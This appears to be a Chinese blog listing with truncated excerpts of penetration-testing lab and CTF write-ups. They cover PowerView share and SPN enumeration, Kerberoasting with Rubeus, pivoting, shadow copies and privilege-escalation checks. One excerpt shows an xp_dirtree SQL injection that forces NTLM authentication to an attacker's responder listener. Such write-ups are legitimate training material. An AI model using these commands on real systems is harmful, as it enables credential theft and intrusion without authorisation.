我 们 将 使 用 PowerView 的 Find-DomainShare 功 能 来 查 找 域 中 的 共 享 。 我 们 还 可 以 添 加 -CheckShareAccess 标志来显示仅供我们使用的共享。但是，我们现在将跳过此标志以返回...

实验环境攻击者 Kali 192.168.192.128受害者 IP 192.168.192.175 Linux 1. 信息收集80端口被过滤掉了看起来是tomcat base64解码大致意思是有个人的密码是password 访问smb服务这个看起来既是...

查看网卡信息有几块网卡，这些网卡所连接的网络。以这台主机为pivot（枢钮）进而去打进（入侵）内网（其他网络）命令：/sbin/ifconfig -a-a查看所有的网络连接（包括非活动的）网卡相关的配置文...

实验环境Kali 192.168.45.247靶机 192.168.219.35 漏洞发掘nmap -p 1-20000 -T5 192.168.219.35发现端口是1881的可疑端口搜索发现可能有CVE-2023-33831漏洞  漏洞利用https://github.com/rod...

shadow copy 也被称作 Volume Shadow Service (VSS)是一种 Microsoft 备份技术，允许创建文件或整个卷的快照。为了管理卷影副本，Microsoft 签名的二进制文件 vshadow.exe作为Windows SDK 的...

靶场信息外网三台主机地址 1. 漏洞挖掘与利用扫描VM4gobuster vm4sqlmap注入可以爆破 先尝试能不能拿到NTLMhash先监听接口responder -I tun0exec master..xp_dirtree '\\192.168.45.229\test'...

简介point 20IllusionDifficulty INTERMEDIATErated by community VERY HARD Do you believe your eyes? 实验环境攻击者 Kali 192.168.45.174受害者 IP 192.168.199.203 Linux 1. 信息收集...

简介GrannyDifficulty Easy 实验环境攻击者 Kali 10.10.16.16受害者 IP 10.10.10.15 Windows 1. 信息收集收集受害者服务详情nmap -p- -T5 -n -vvv -oA Granny -noscript 10.10.10.15IIS 6.0...

1. 查看用户家目录中有没有任何感兴趣的文件 能否访问ls -ahlR /root/ ls -ahlR /home/ -R 递归显示 -h 以可读的方式显示文件大小 Tips: 默认情况下，用户的家目录是位于/home目录下 2. 关于密...

任务使用kerberoast攻击 破解密码找到SQL Server 服务账户 找出以用户帐户运行的服务以及以机器帐户运行的服务. C:\AD\Tools\PowerView.ps1Get-DomainUser -SPN 使用Rubeus得到svcadmin accou...